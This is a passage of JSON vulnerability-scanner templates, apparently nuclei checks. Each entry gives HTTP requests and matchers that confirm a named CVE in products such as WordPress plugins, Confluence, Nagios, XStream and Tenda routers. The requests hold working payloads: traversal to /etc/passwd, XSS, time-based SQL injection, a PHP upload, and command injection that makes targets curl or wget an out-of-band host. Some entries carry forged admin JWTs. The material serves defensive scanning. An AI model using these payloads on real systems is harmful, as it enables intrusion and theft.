Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2755","info":{"name":"WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>+-+-1-+-+alert(document.domain)</script>\")","contains(body_2, \"ab-google-map-travel\")"],"condition":"and"}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3224","info":{"name":"Ruby on Rails Web Console - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{randstr}}"],"headers":{"X-Forwarded-For":"::1"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Rails.root:","Action Controller: Exception caught"],"condition":"and"},{"type":"word","part":"response","words":["X-Web-Console-Session-Id","data-remote-path=","data-session-id="],"case-insensitive":true,"condition":"or"}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Navis","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-26292","info":{"name":"AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure","severity":"low"},"requests":[{"raw":["DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["caldav_public_user","GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44910","info":{"name":"SpringBlade - Information Leakage","severity":"high"},"requests":[{"raw":["GET /api/blade-user/user-list HTTP/1.1\nHost: {{Hostname}}\nBlade-Auth: bearer {{bearer}}\n"],"payloads":{"bearer":["eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"account\":","\"password\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Elementor Website Builder","Elementor Page Builder"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4')"]},{"type":"regex","part":"body","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-45968","info":{"name":"Pascom CPS  - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /services/pluginscript/ HTTP/1.1\nHost: {{Hostname}}\nGET /services/pluginscript/..;/..;/ HTTP/1.1\nHost: {{Hostname}}\nGET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 != status_code_1"],"condition":"and"}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["User-Agent: (curl|CertUtil)"]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site 